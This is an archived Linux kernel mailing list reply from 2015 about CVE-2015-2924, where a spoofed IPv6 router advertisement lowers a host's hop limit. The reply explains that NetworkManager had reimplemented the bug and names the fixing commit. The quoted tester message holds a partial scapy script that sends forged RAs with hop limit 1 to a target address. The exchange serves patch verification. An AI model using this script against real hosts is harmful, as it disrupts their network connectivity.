Re: [GIT] Networking
From: D.S. Ljungmark
Date: Wed Apr 29 2015 - 11:17:38 EST
On 29/04/15 16:51, Denys Vlasenko wrote:
> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@xxxxxxxxxxxxx> wrote:
>> D.S. Ljungmark (1):
>> ipv6: Don't reduce hop limit for an interface
> I was testing this change and apparently it doesn't close the hole.
> The python script I use to send RAs:
> #!/usr/bin/env python
> import sys
> import time
> import scapy.all
> from scapy.layers.inet6 import *
> ip = IPv6()
> # ip.dst = 'ff02::1'
> ip.dst = sys.argv
> icmp = ICMPv6ND_RA()
> icmp.chlim = 1
> for x in range(10):
> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> Sent 1 packets.
> ...<10 times>...
> Sent 1 packets.
> After I do this, on the targeted machine I check hop_limits:
> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS
> As you see, the interface which received RAs still lowered
> its hop_limit to 1. I take it means that the bug is still present
> (right? I'm not a network guy...).
It might not be present in the _kernel_. Do you run NetworkManager on
your system? If so, see below.
> I triple-checked that I do run the kernel with the fix.
> Further investigation shows that the code touched by the fix
> is not even reached, hop_limit is changed elsewhere.
> I'm willing to test additional patches.
NetworkManager had it's own re-implementation of the bug. It got fixed
with NetworkManager commit:
Author: Thomas Haller <thaller@xxxxxxxxxx>
Date: Wed Apr 8 15:54:30 2015 +0200
platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
Beforte that commit, NetworkManager would take the RA packet, extract
the hop limit, and write it to the sysctl itself.
8362 CB14 98AD 11EF CEB6 FA81 FCC3 7674 449E 3CFC
Description: OpenPGP digital signature